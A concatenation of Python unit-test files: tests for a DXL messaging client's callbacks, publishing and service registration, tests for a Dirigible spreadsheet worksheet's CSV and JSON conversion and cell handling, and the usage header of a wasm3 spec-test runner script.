self.assertEqual(event_callback.on_event.call_count, 1)
self.client.remove_event_callback(self.test_channel, event_callback)
self.client._handle_message(self.test_channel, evt)
# Check that callback was not called again - because the event
# callback was unregistered
self.assertEqual(event_callback.on_event.call_count, 1)
def test_client_handle_message_with_request_calls_request_callback(self):
req_callback = RequestCallback()
req_callback.on_request = Mock()
self.client.add_request_callback(self.test_channel, req_callback)
# Create and process Request
req = Request(destination_topic=self.test_channel)._to_bytes()
self.client._handle_message(self.test_channel, req)
# Check that callback was called
self.assertEqual(req_callback.on_request.call_count, 1)
self.client.remove_request_callback(self.test_channel, req_callback)
self.client._handle_message(self.test_channel, req)
# Check that callback was not called again - because the request
# callback was unregistered
self.assertEqual(req_callback.on_request.call_count, 1)
def test_client_handle_message_with_response_calls_response_callback(self):
callback = ResponseCallback()
callback.on_response = Mock()
self.client.add_response_callback(self.test_channel, callback)
# Create and process Response
msg = Response(request=None)._to_bytes()
self.client._handle_message(self.test_channel, msg)
# Check that callback was called
self.assertEqual(callback.on_response.call_count, 1)
self.client.remove_response_callback(self.test_channel, callback)
self.client._handle_message(self.test_channel, msg)
# Check that callback was not called again - because the response
# callback was unregistered
self.assertEqual(callback.on_response.call_count, 1)
def test_client_remove_call_for_unregistered_callback_does_not_error(self):
callback = EventCallback()
callback.on_event = Mock()
callback2 = EventCallback()
callback2.on_event = Mock()
self.client.add_event_callback(self.test_channel, callback)
self.client.add_event_callback(self.test_channel, callback2)
self.client.remove_event_callback(self.test_channel, callback)
self.client.remove_event_callback(self.test_channel, callback)
def test_client_send_event_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Event(destination_topic="")
self.client.send_event(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_send_request_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Request(destination_topic="")
self.client._send_request(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_send_response_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Response(request=None)
self.client.send_response(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_handles_error_response_and_fire_response_handler(self):
self.client._fire_response = Mock(return_value=None)
# Create and process Request
msg = ErrorResponse(request=None, error_code=666, error_message="test message")
payload = msg._to_bytes()
# Handle error response message
self.client._handle_message(self.test_channel, payload)
# Check that message response was properly delivered to handler
self.assertEqual(self.client._fire_response.call_count, 1)
def test_client_subscribe_no_ack_raises_timeout(self):
self.client._client.subscribe = Mock(
return_value=(mqtt.MQTT_ERR_SUCCESS, 2))
self.client._connected = Mock(return_value=True)
with patch.object(DxlClient, '_MAX_PACKET_ACK_WAIT', 0.01):
with self.assertRaises(WaitTimeoutException):
self.client.subscribe(self.test_channel)
def test_client_unsubscribe_no_ack_raises_timeout(self):
self.client._client.subscribe = Mock(
return_value=(mqtt.MQTT_ERR_SUCCESS, 2))
self.client._client.unsubscribe = Mock(
return_value=(mqtt.MQTT_ERR_SUCCESS, 3))
self.client._connected = Mock(return_value=True)
original_wait_packet_acked_func = self.client._wait_for_packet_ack
self.client._wait_for_packet_ack = Mock(return_value=None)
self.client.subscribe(self.test_channel)
self.client._wait_for_packet_ack = original_wait_packet_acked_func
with patch.object(DxlClient, '_MAX_PACKET_ACK_WAIT', 0.01):
with self.assertRaises(WaitTimeoutException):
self.client.unsubscribe(self.test_channel)
# Service unit tests
def test_client_register_service_subscribes_client_to_channel(self):
channel = '/mcafee/service/unittest'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
# Add topics to the service
service_info.add_topic(channel + "1", RequestCallback())
service_info.add_topic(channel + "2", RequestCallback())
service_info.add_topics({channel + str(i): RequestCallback()
for i in range(3, 6)})
subscriptions_before_registration = self.client.subscriptions
expected_subscriptions_after_registration = \
sorted(subscriptions_before_registration +
tuple(channel + str(i) for i in range(1, 6)))
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions_after_registration = self.client.subscriptions
self.assertEqual(expected_subscriptions_after_registration,
sorted(subscriptions_after_registration))
def test_client_wont_register_the_same_service_twice(self):
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
# Register service in client
self.client.register_service_async(service_info)
with self.assertRaises(dxlclient.DxlException):
# Re-register service
self.client.register_service_async(service_info)
def test_client_register_service_sends_register_request_to_broker(self):
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
self.client._send_request = Mock(return_value=True)
self.client._connected = Mock(return_value=True)
# Register service in client
self.client.register_service_async(service_info)
time.sleep(2)
# Check that method has been called
self.assertTrue(self.client._send_request.called)
def test_client_register_service_unsubscribes_client_to_channel(self):
channel1 = '/mcafee/service/unittest/one'
channel2 = '/mcafee/service/unittest/two'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions = self.client.subscriptions
self.assertIn(channel1, subscriptions, "Client wasn't subscribed to service channel")
self.assertIn(channel2, subscriptions, "Client wasn't subscribed to service channel")
self.client.unregister_service_async(service_info)
subscriptions = self.client.subscriptions
self.assertNotIn(channel1, subscriptions, "Client wasn't unsubscribed to service channel")
self.assertNotIn(channel2, subscriptions, "Client wasn't unsubscribed to service channel")
def test_client_register_service_unsuscribes_from_channel_by_guid(self):
channel1 = '/mcafee/service/unittest/one'
channel2 = '/mcafee/service/unittest/two'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Create same dummy service - different object
service_info2 = service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info._service_id = service_info.service_id
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions = self.client.subscriptions
self.assertIn(channel1, subscriptions, "Client wasn't subscribed to service channel")
self.assertIn(channel2, subscriptions, "Client wasn't subscribed to service channel")
self.client.unregister_service_async(service_info2)
subscriptions = self.client.subscriptions
self.assertNotIn(channel1, subscriptions, "Client wasn't unsubscribed to service channel")
self.assertNotIn(channel2, subscriptions, "Client wasn't unsubscribed to service channel")
@attr('system')
class DxlClientSystemClientTest(BaseClientTest):
def test_client_connects_to_broker_and_sets_current_broker(self):
with self.create_client() as client:
broker_ids = [broker.unique_id for broker in client.config.brokers]
client.connect()
self.assertTrue(client.connected)
self.assertIn(client.current_broker.unique_id, broker_ids)
def test_client_raises_exception_when_cannot_sync_connect_to_broker(self):
with self.create_client(max_retries=0) as client:
broker = Broker("localhost", UuidGenerator.generate_id_as_string(),
"127.0.0.255", 58883)
client._config.brokers = [broker]
with self.assertRaises(DxlException):
client.connect()
def test_client_receives_event_on_topic_only_after_subscribe(self):
"""
The idea of this test is to send an event to a topic which we are not
subscribed, so we shouldn't be notified. Then, we subscribe to that
topic and send a new event, we should get that last one.
"""
with self.create_client() as client:
test_topic = '/test/whatever/' + client.config._client_id
client.connect()
self.assertTrue(client.connected)
# Set request callback (use mock to easily check when it was called)
ecallback = EventCallback()
ecallback.on_event = Mock()
client.add_event_callback(test_topic, ecallback, False)
# Send event thru dxl fabric to a topic which we are *not* subscribed
msg = Event(destination_topic=test_topic)
client.send_event(msg)
time.sleep(1)
# We haven't been notified
self.assertEqual(ecallback.on_event.call_count, 0)
# Subscribe to topic
client.subscribe(test_topic)
# Send event thru dxl fabric again to that topic
msg = Event(destination_topic=test_topic)
client.send_event(msg)
time.sleep(1)
# Now we should have been notified of the event
self.assertEqual(ecallback.on_event.call_count, 1)
def test_client_receives_error_response_on_request_to_unknown_service(self):
"""
The idea of this test is to send a sync request to an unknown service
and get a "unable to locate service" error response.
"""
with self.create_client() as client:
test_topic = '/test/doesntexists/' + client.config._client_id
client.connect()
self.assertTrue(client.connected)
# Send request thru dxl fabric to a service which doesn't exists
msg = Request(destination_topic=test_topic)
msg.service_id = UuidGenerator.generate_id_as_string()
response = client.sync_request(msg, 1)
# Check that we have an error response for our request
self.assertTrue(isinstance(response, ErrorResponse))
self.assertEqual(response.service_id, msg.service_id)
if __name__ == '__main__':
unittest.main()
|
test_worksheet.py | # Copyright (c) 2010 Resolver Systems Ltd, PythonAnywhere LLP
# See LICENSE.md
#
from __future__ import with_statement
try:
import unittest2 as unittest
except ImportError:
import unittest
import codecs
import json
import simplejson as json
from StringIO import StringIO
from mock import Mock, patch
from threading import Thread
from dirigible.test_utils import ResolverTestCase
from sheet.cell import Cell, undefined
from sheet.worksheet import (
Bounds, InvalidKeyError, Worksheet, worksheet_to_csv,
worksheet_to_json, worksheet_from_json,
)
class WorksheetToCsvTest(ResolverTestCase):
@patch('sheet.worksheet.csv')
@patch('sheet.worksheet.StringIO')
def test_should_use_stringio_and_return_result(self, mock_stringio_class, mock_csv):
mock_stringio_object = mock_stringio_class.return_value
def check_getvalue_has_been_called():
self.assertCalledOnce(mock_stringio_object.getvalue)
mock_stringio_object.close.side_effect = check_getvalue_has_been_called
ws = Worksheet()
ws.A1.value = "test data"
result = worksheet_to_csv(ws, encoding='ascii')
self.assertCalledOnce(mock_csv.writer, mock_stringio_object)
self.assertEquals(result, mock_stringio_object.getvalue.return_value)
self.assertCalledOnce(mock_stringio_object.close)
@patch('sheet.worksheet.csv')
def test_should_handle_empty_worksheet(self, mock_csv):
ws = Worksheet()
result = worksheet_to_csv(ws, encoding='ascii')
mock_writer = mock_csv.writer.return_value
self.assertFalse(mock_writer.writerow.called)
def test_should_convert_unicode_to_windows_1252(self):
ws = Worksheet()
ws.a1.value = u'Sacr\xe9 bleu!'
ws.a2.value = u'\xa312.95'
ws.a3.value = u'\u20ac9.99'
result = worksheet_to_csv(ws, encoding='windows-1252')
self.assertEquals(
result.split('\r\n')[:-1],
[
ws.a1.value.encode('windows-1252'),
ws.a2.value.encode('windows-1252'),
ws.a3.value.encode('windows-1252'),
]
)
def test_raises_on_attempting_to_encode_nonwestern_chars_to_excel_format(self):
some_kanji = u'\u30bc\u30ed\u30a6\u30a3\u30f3\u30b0'
ws = Worksheet()
ws.a1.value = some_kanji
self.assertRaises(
UnicodeEncodeError,
lambda : worksheet_to_csv(ws, encoding='windows-1252')
)
def test_handles_cell_values_set_to_non_ascii_bytes(self):
a_large_number = 25700000000.0
ws = Worksheet()
ws.a1.value = a_large_number
result = worksheet_to_csv(ws, encoding='windows-1252')
stream = StringIO()
stream.write(result)
stream.seek(0)
decoder = codecs.getreader('windows-1252')(stream)
decoder.read()
def test_can_convert_unicode_to_utf8(self):
some_kanji = u'\u30bc\u30ed\u30a6\u30a3\u30f3\u30b0'
ws = Worksheet()
ws.a1.value = some_kanji
result = worksheet_to_csv(ws, encoding='utf-8')
self.assertEquals(
result.split('\r\n')[:-1],
[
ws.a1.value.encode('utf-8'),
]
)
@patch('sheet.worksheet.csv')
def test_should_process_contents_in_raster_order(self, mock_csv):
ws = Worksheet()
ws.A1.value = 1
ws.B1.value = 2
ws.C1.value = 3
ws.A2.value = 4
ws.B2.value = 5
ws.C2.value = 6
result = worksheet_to_csv(ws, encoding='windows-1252')
mock_writer = mock_csv.writer.return_value
self.assertEquals(
mock_writer.writerow.call_args_list,
[
(([1, 2, 3],), {}),
(([4, 5, 6],), {})
]
)
@patch('sheet.worksheet.csv')
def test_should_include_everything_from_A1_outwards(self, mock_csv):
ws = Worksheet()
ws.B3.value = 5
result = worksheet_to_csv(ws, encoding='windows-1252')
mock_writer = mock_csv.writer.return_value
self.assertEquals(
mock_writer.writerow.call_args_list,
[
((["", ""],), {}),
((["", ""],), {}),
((["", 5],), {})
]
)
class WorksheetJSONificationTest(ResolverTestCase):
def test_empty_worksheet_to_json(self):
worksheet = Worksheet()
worksheet_json = worksheet_to_json(worksheet)
self.assertEquals(
json.loads(worksheet_json),
{
"_console_text": "",
"_usercode_error": None,
}
)
@patch('sheet.worksheet.StringIO')
def test_worksheet_to_json_remembers_to_close_stringIO_stream(self, mock_stringio):
worksheet = Worksheet()
mock_stringio.return_value = Mock()
worksheet_to_json(worksheet)
self.assertCalledOnce(mock_stringio.return_value.close)
def test_worksheet_with_data_to_json(self):
self.maxDiff = None
worksheet = Worksheet()
worksheet.B29.formula = "a constant"
worksheet.B29.value = 56
worksheet.B29.formatted_value = "fifty-six"
worksheet.B29.error = "b0rken"
worksheet.C29.formula = "another constant"
worksheet.C29.value = ["value", "is", "a", "list"]
worksheet.C29.formatted_value = "[the same list]"
class UnJSONableObject(object):
def __str__(self):
return "The result of str-ing the object"
worksheet.D29.formula = None
worksheet.D29.value = UnJSONableObject()
worksheet.D29.formatted_value = "The formatted object"
worksheet.E29.formula = '=1 + 2'
worksheet.E29.value = 3
worksheet.E29.formatted_value = "Three"
worksheet._console_text = "The console text"
worksheet._usercode_error = { "message": "The usercode error", "line": 23 }
worksheet_json = worksheet_to_json(worksheet)
self.assertEquals(
json.loads(worksheet_json),
{
u"2,29" : {
u"formula" : u"a constant",
u"value" : 56,
u"formatted_value": u"fifty-six",
u"error": u"b0rken"
},
u"3,29" : {
u"formula" : u"another constant",
u"value" : [u"value", u"is", u"a", u"list"],
u"formatted_value": u"[the same list]"
},
u"4,29" : {
u"formula" : None,
u"formatted_value": u"The formatted object",
},
u"5,29" : {
u"formula" : u"=1 + 2",
u"python_formula" : u"1 + 2",
u"value": 3,
u"formatted_value": u"Three",
},
u"_console_text": u"The console text",
u"_usercode_error": { u"message": u"The usercode error", u"line": 23 },
}
)
def test_dependencies_get_put_in_json_as_array_of_arrays(self):
self.maxDiff = None
worksheet = Worksheet()
worksheet.A1.dependencies = [(1, 2)]
worksheet._console_text = ""
worksheet_json = worksheet_to_json(worksheet)
self.assertEquals(
json.loads(worksheet_json),
{
u"1,1" : {
u"formula" : None,
u"formatted_value" : u"",
u"dependencies" : [[1, 2]],
},
u"_console_text": u"",
u"_usercode_error": None,
}
)
def test_nan_values_are_ignored(self):
self.maxDiff = None
worksheet = Worksheet()
worksheet.A1.value = float('nan')
worksheet.A2.value = float('inf')
worksheet.A3.value = float('-inf')
worksheet_json = worksheet_to_json(worksheet)
roundtripped = json.loads(worksheet_json)
self.assertEquals(roundtripped["1,1"]['formatted_value'], 'nan')
self.assertEquals(roundtripped["1,2"]['formatted_value'], 'inf')
self.assertEquals(roundtripped["1,3"]['formatted_value'], '-inf')
self.assertFalse('value' in roundtripped["1,1"])
self.assertFalse('value' in roundtripped["1,2"])
self.assertFalse('value' in roundtripped["1,3"])
def test_empty_worksheet_from_json(self):
worksheet = worksheet_from_json(
json.dumps(
{
"_console_text": "",
"_usercode_error": None,
}
)
)
self.assertEquals(worksheet._console_text, "")
self.assertEquals(worksheet._usercode_error, None)
self.assertIsNotNone(worksheet._console_lock)
def test_worksheet_with_data_from_json(self):
worksheet = worksheet_from_json(
json.dumps(
{
"2,29" : {
"formula" : "a formula",
"value" : 56,
"dependencies" : [[4, 3], [2, 1]],
"formatted_value": "fifty-six",
"error": "b0rken"
},
"3,29" : {
"formula" : "another formula",
"value" : ["value", "is", "a", "list"],
"formatted_value": "[the same list]"
},
"4,29" : {
"formula" : None,
"formatted_value": "The formatted object",
},
"5,29" : {
"formula" : "=2 + 4",
"python_formula" : "2 + 4",
"value" : 6,
"formatted_value": "six",
},
"6,29" : {
"formula" : "=I don't have a python formula. I don't want one.",
"value" : 7,
"formatted_value": "seven",
},
"_console_text": "The console text",
"_usercode_error": { "message": "The usercode error", "line": 23 },
}
)
)
self.assertEquals(worksheet.B29.formula, "a formula")
self.assertEquals(worksheet.B29.python_formula, None)
self.assertEquals(worksheet.B29.dependencies, [(4, 3), (2, 1)])
self.assertEquals(worksheet.B29.value, 56)
self.assertEquals(worksheet.B29.formatted_value, "fifty-six")
self.assertEquals(worksheet.B29.error, "b0rken")
self.assertEquals(worksheet.C29.formula, "another formula")
self.assertEquals(worksheet.C29.python_formula, None)
self.assertEquals(worksheet.C29.value, ["value", "is", "a", "list"])
self.assertEquals(worksheet.C29.formatted_value, "[the same list]")
self.assertEquals(worksheet.D29.formula, None)
self.assertEquals(worksheet.D29.python_formula, None)
self.assertEquals(worksheet.D29.value, undefined)
self.assertEquals(worksheet.D29.formatted_value, "The formatted object")
self.assertEquals(worksheet.E29.formula, "=2 + 4")
self.assertEquals(worksheet.E29.python_formula, "2 + 4")
self.assertEquals(worksheet.E29.value, 6)
self.assertEquals(worksheet.E29.formatted_value, "six")
self.assertEquals(worksheet.F29.formula, "=I don't have a python formula. I don't want one.")
self.assertEquals(worksheet.F29.python_formula, None)
self.assertEquals(worksheet.F29.value, 7)
self.assertEquals(worksheet.F29.formatted_value, "seven")
self.assertEquals(worksheet._console_text, "The console text")
self.assertEquals(worksheet._usercode_error, { "message": "The usercode error", "line": 23 })
self.assertIsNotNone(worksheet._console_lock)
@patch('sheet.worksheet.json')
def test_worksheet_from_json_uses_json(self, mock_json):
mock_json.loads.return_value = {}
worksheet_from_json('{}')
self.assertCalledOnce(mock_json.loads, '{}')
class WorksheetTest(unittest.TestCase):
def test_initialise(self):
ws = Worksheet()
self.assertEquals(dict(ws), {})
self.assertEquals(ws._console_text, '')
self.assertEquals(ws._usercode_error, None)
self.assertEquals(ws.name, None)
def test_repr(self):
ws = Worksheet()
self.assertEquals(repr(ws), '<Worksheet>')
ws.name = 'test worksheet'
self.assertEquals(repr(ws), '<Worksheet test worksheet>')
def test_equality(self):
ws1 = Worksheet()
ws2 = Worksheet()
ws2.A1.formula = 'a difference'
self.assertFalse(ws1==ws2)
self.assertTrue(ws1!=ws2)
ws3 = Worksheet()
self.assertTrue(ws1==ws3)
self.assertFalse(ws1!=ws3)
ws3.name = 'a different name!'
self.assertFalse(ws1==ws3)
self.assertTrue(ws1!=ws3)
nonWs = 1.2
self.assertFalse(ws1==nonWs)
self.assertTrue(ws1!=nonWs)
def test_append_console_text(self):
ws = Worksheet()
ws.add_console_text('a first error')
self.assertEquals(
ws._console_text,
'<span class="console_error_text">a first error</span>')
ws.add_console_text('a second error\noh noez!')
self.assertEquals(
ws._console_text,
'<span class="console_error_text">a first error</span>'
'<span class="console_error_text">a second error\n'
'oh noez!</span>')
ws.add_console_text('not an error', log_type='output')
self.assertEquals(
ws._console_text,
'<span class="console_error_text">a first error</span>'
'<span class="console_error_text">a second error\n'
'oh noez!</span>'
'<span class="console_output_text">not an error</span>')
ws.add_console_text('A system timing report, for example :-)', log_type='system')
self.assertEquals(
ws._console_text,
'<span class="console_error_text">a first error</span>'
'<span class="console_error_text">a second error\n'
'oh noez!</span>'
'<span class="console_output_text">not an error</span>'
'<span class="console_system_text">A system timing report, for example :-)</span>')
ws.add_console_text('<b></b>', log_type='output')
self.assertEquals(
ws._console_text,
'<span class="console_error_text">a first error</span>'
'<span class="console_error_text">a second error\n'
'oh noez!</span>'
'<span class="console_output_text">not an error</span>'
'<span class="console_system_text">A system timing report, for example :-)</span>'
'<span class="console_output_text"><b></b></span>')
def test_to_location(self):
ws = Worksheet()
self.assertEquals( ws.to_location((1, 2)), (1, 2) )
self.assertEquals( ws.to_location((1L, 2L)), (1L, 2L) )
self.assertEquals( ws.to_location(('a', 2)), (1, 2) )
self.assertEquals( ws.to_location(('A', 2)), (1, 2) )
self.assertEquals( ws.to_location('a2'), (1, 2) )
self.assertEquals( ws.to_location('A2'), (1, 2) )
self.assertEquals( ws.to_location('A'), None )
self.assertEquals( ws.to_location('1A'), None )
self.assertEquals( ws.to_location((1, 'A')), None )
self.assertEquals( ws.to_location(123), None )
self.assertEquals( ws.to_location(object()), None )
def test_setitem_on_locations_should_accept_cell_instances(self):
ws = Worksheet()
ws.to_location = Mock(return_value=(1, 2))
cell = Cell()
ws[3, 4] = cell
self.assertEquals(ws.to_location.call_args_list, [(((3, 4),), {})])
self.assertEquals(ws.keys(), [(1, 2)])
def test_setitem_on_locations_should_reject_non_cell_instances(self):
ws = Worksheet()
ws.to_location = Mock(return_value=(1, 2))
expected_message_re = "^Worksheet locations must be Cell objects"
with self.assertRaisesRegexp(TypeError, expected_message_re):
ws[3, 4] = 123
self.assertEquals(ws.to_location.call_args_list, [(((3, 4),), {})])
def test_setitem_on_non_locations_raises_keyerror(self):
ws = Worksheet()
ws.to_location = Mock(return_value=None)
with self.assertRaisesRegexp(InvalidKeyError, "^'random key' is not a valid cell location$"):
ws['random key'] = 'sausages'
def test_getitem_creates_cells(self):
ws = Worksheet()
try:
ws[1, 2].value = Cell()
except KeyError:
self.fail('Did not create cell on request')
def test_get_item_does_not_create_cells_for_random_strings(self):
ws = Worksheet()
with self.assertRaisesRegexp(InvalidKeyError, "^'name' is not a valid cell location$"):
ws['name']
with self.assertRaisesRegexp(AttributeError, "^'Worksheet' object has no attribute 'some_random_attribute'$"):
ws.some_random_attribute
def test_getitem_should_use_to_location_result_if_it_is_not_none(self):
ws = Worksheet()
ws.to_location = Mock(return_value=(1, 2))
ws[3, 4].formula = "hello"
self.assertEquals(ws.to_location.call_args_list, [(((3, 4),), {})])
self.assertEquals(ws.keys(), [(1, 2)])
self.assertEquals(ws.values()[0].formula, "hello")
def test_getitem_should_use_original_key_if_to_location_gives_none(self):
ws = Worksheet()
ws.to_location = Mock(return_value=(3, 4))
ws[3, 4].formula = "hello"
self.assertEquals(ws.to_location.call_args_list, [(((3, 4),), {})])
self.assertEquals(ws.keys(), [(3, 4)])
self.assertEquals(ws.values()[0].formula, "hello")
def test_getattr_should_delegate_to_getitem(self):
ws = Worksheet()
ws.__getitem__ = Mock()
retval = ws.A1
self.assertEquals( retval, ws.__getitem__.return_value )
self.assertEquals( ws.__getitem__.call_args_list, [(('A1',), {})] )
@patch('sheet.worksheet.cell_name_to_coordinates')
def test_setattr_should_delegate_to_setitem_if_attr_name_is_valid_cell_name(
self, mock_name_to_coords
):
def name_to_coords(name):
if name == 'A1':
return (2, 3)
else:
return None
mock_name_to_coords.side_effect = name_to_coords
ws = Worksheet()
ws.__setitem__ = Mock()
ws.A1 = 23
self.assertEquals( ws.__setitem__.call_args_list, [(((2, 3), 23), {})] )
@patch('sheet.worksheet.cell_name_to_coordinates', lambda _: None)
def test_setattr_should_not_delegate_to_setitem_if_attr_name_is_not_valid_cell_name(self):
ws = Worksheet()
ws.__setitem__ = Mock()
ws.A1 = 23
self.assertEquals( ws.__setitem__.call_args_list, [] )
self.assertEquals( ws.A1, 23 )
def test_set_cell_formula_with_value_should_update_internal_contents(self):
ws = Worksheet()
ws.set_cell_formula(1, 2, "3")
self.assertEquals(ws[1, 2].formula, '3')
def test_set_cell_formula_with_empty_string_should_clear_internal_contents_if_they_exist(self):
ws = Worksheet()
ws[1, 2].formula = "=1"
ws.set_cell_formula(1, 2, "")
self.assertFalse((1, 2) in ws)
def test_set_cell_formula_with_empty_string_should_do_nothing_if_no_preexisting_internal_contents(self):
ws = Worksheet()
ws.set_cell_formula(1, 2, "")
self.assertFalse((1, 2) in ws)
def test_clear_values_clears_values_and_formatted_values_and_errors(self):
ws = Worksheet()
ws[1, 2].formula = "=1"
ws[1, 2].python_formula = "2"
ws[1, 2].value = "hello!"
ws[1, 2].formatted_value = "Guten Tag!"
ws[1, 2].error = "Goodness Gracious!"
ws[2, 2].python_formula = "1 + 1"
ws.clear_values()
self.assertEquals(ws[1, 2].formula, "=1")
self.assertEquals(ws[1, 2].python_formula, "2")
self.assertEquals(ws[1, 2].value, undefined)
self.assertEquals(ws[1, 2].formatted_value, u'')
self.assertEquals(ws[1, 2].error, None)
self.assertEquals(ws[2, 2].python_formula, '1 + 1')
def test_clear_values_deletes_cells_with_no_formula(self):
ws = Worksheet()
ws[1, 2].formula = None
ws[1, 2].value = "hello!"
ws[1, 2].formatted_value = "Guten Tag!"
ws.clear_values()
self.assertFalse((1, 2) in ws)
def test_clear_values_deletes_cells_with_empty_formula(self):
ws = Worksheet()
ws[1, 2].formula = ''
ws[1, 2].value = "hello!"
ws[1, 2].formatted_value = "Guten Tag!"
ws.clear_values()
self.assertFalse((1, 2) in ws)
def test_iteration_yields_cells(self):
ws = Worksheet()
ws[1, 1].formula = 'A1'
ws[2, 4].formula = 'B4'
ws.name = 'any old name'
self.assertEquals(ws.items(), [((1, 1), ws[1, 1]), ((2, 4), ws[2, 4])])
def test_add_console_text_is_thread_safe(self):
ws = Worksheet()
num_threads = 100
num_chars = 1000
num_tries = 20
def get_console_text_adder(char_num):
def inner():
for _ in range(num_tries):
ws.add_console_text(str(char_num) * num_chars)
return inner
threads = []
for i in range(num_threads):
threads.append(Thread(target=get_console_text_adder(i)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for i in range(num_threads):
found_pos = -num_chars
for _ in range(num_tries):
found_pos = ws._console_text.find(str(i) * num_chars, found_pos + num_chars)
self.assertNotEqual(found_pos, -1, 'could not find all output for thread %s' % (str(i),))
def test_getting_bounds_on_empty_sheet_should_return_none(self):
ws = Worksheet()
self.assertEquals(ws.bounds, None)
def test_getting_bounds_with_one_cell_should_return_bounds(self):
ws = Worksheet()
ws[3, 5].value = "Top right and bottom left!"
self.assertEquals(type(ws.bounds), Bounds)
self.assertEquals(ws.bounds, (3, 5, 3, 5))
def test_getting_bounds_with_two_cells_should_return_bounds(self):
ws = Worksheet()
ws[5, 3].value = "Top right"
ws[3, 11].value = "Bottom left"
self.assertEquals(type(ws.bounds), Bounds)
self.assertEquals(ws.bounds, (3, 3, 5, 11))
def test_setting_bounds_should_fail(self):
ws = Worksheet()
with self.assertRaises(AttributeError):
ws.bounds = Bounds((1, 2, 3, 4))
class TestWorksheetCellRangeConstructor(ResolverTestCase):
def test_two_tuple_parameters(self):
ws = Worksheet()
cell_range = ws.cell_range((2, 3), (5, 4))
self.assertEquals(cell_range.left, 2)
self.assertEquals(cell_range.top, 3)
self.assertEquals(cell_range.right, 5)
self.assertEquals(cell_range.bottom, 4)
def test_single_string_parameter_uses_formula_notation(self):
ws = Worksheet()
cell_range = ws.cell_range('A2:C4')
self.assertEquals(cell_range.left, 1)
self.assertEquals(cell_range.top, 2)
self.assertEquals(cell_range.right, 3)
self.assertEquals(cell_range.bottom, 4)
try:
_ = ws.cell_range('A1:wibble')
self.fail('should raise ValueError')
except ValueError, e:
self.assertEquals(str(e), "Invalid cell range 'A1:wibble'")
try:
_ = ws.cell_range('wobblewibble')
self.fail('should raise ValueError')
except ValueError, e:
self.assertEquals(str(e), "Invalid cell range 'wobblewibble'")
def test_double_string_parameters_use_a1_notation(self):
ws = Worksheet()
cell_range = ws.cell_range('A2','C4')
self.assertEquals(cell_range.left, 1)
self.assertEquals(cell_range.top, 2)
self.assertEquals(cell_range.right, 3)
self.assertEquals(cell_range.bottom, 4)
try:
_ = ws.cell_range('wabble','C4')
self.fail('should raise ValueError')
except ValueError, e:
self.assertEquals(str(e), "wabble is not a valid cell location")
try:
_ = ws.cell_range('A1','wooble')
self.fail('should raise ValueError')
except ValueError, e:
self.assertEquals(str(e), "wooble is not a valid cell location")
try:
_ = ws.cell_range('weebble','beeble')
self.fail('should raise ValueError')
except ValueError, e:
self.assertEquals(str(e), "Neither weebble nor beeble are valid cell locations")
def test_mixed_parameters(self):
ws = Worksheet()
cell_range = ws.cell_range((10, 10),'C4')
self.assertEquals(cell_range.left, 3)
self.assertEquals(cell_range.top, 4)
self.assertEquals(cell_range.right, 10)
self.assertEquals(cell_range.bottom, 10)
try:
_ = ws.cell_range('wipple',(1,2))
self.fail('should raise ValueError')
except ValueError, e:
self.assertEquals(str(e), "wipple is not a valid cell location")
try:
_ = ws.cell_range((2, 2),'wapple')
self.fail('should raise ValueError')
except ValueError, e:
self.assertEquals(str(e), "wapple is not a valid cell location")
class BoundsTest(ResolverTestCase):
def test_bounds_acts_like_tuple(self):
bounds = Bounds((1, 2, 3, 4))
self.assertTrue(isinstance(bounds, tuple))
left, top, right, bottom = bounds
self.assertEquals((left, top, right, bottom), (1, 2, 3, 4))
def test_bounds_has_sweet_properties(self):
bounds = Bounds((1, 2, 3, 4))
self.assertEquals(bounds.left, 1)
self.assertEquals(bounds.top, 2)
self.assertEquals(bounds.right, 3)
self.assertEquals(bounds.bottom, 4)
def test_bounds_barfs_on_wrong_number_of_parameters(self):
self.assertRaises(ValueError, lambda : Bounds((1, 2, 3)))
self.assertRaises(ValueError, lambda : Bounds((1, 2, 3, 4, 5)))
|
run-spec-test.py | #!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-spec-test.py
# ./run-spec-test.py ./core/i32.json
# ./run-spec-test.py ./core/float_exprs.json --line 2070
# ./run-spec-test.py ./proposals/tail-call/*.json
# ./run-spec-test.py --exec "../build-custom/wasm3 --repl"
#
# Running WASI verison with different engines:
# cp ../build-wasi/wasm3.wasm ./
# ./run-spec-test.py --exec "../build/wasm3 wasm3.wasm --repl"
# ./run-spec-test.py --exec "wasmtime --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. --backend=llvm wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer-js run wasm3.wasm --dir=. -- --repl"
# ./run-spec-test.py --exec "wasirun wasm3.wasm --repl"
# ./run-spec-test.py --exec "wavm run --mount-root ./ wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "iwasm --dir=. wasm3.wasm --repl"
#
# TODO
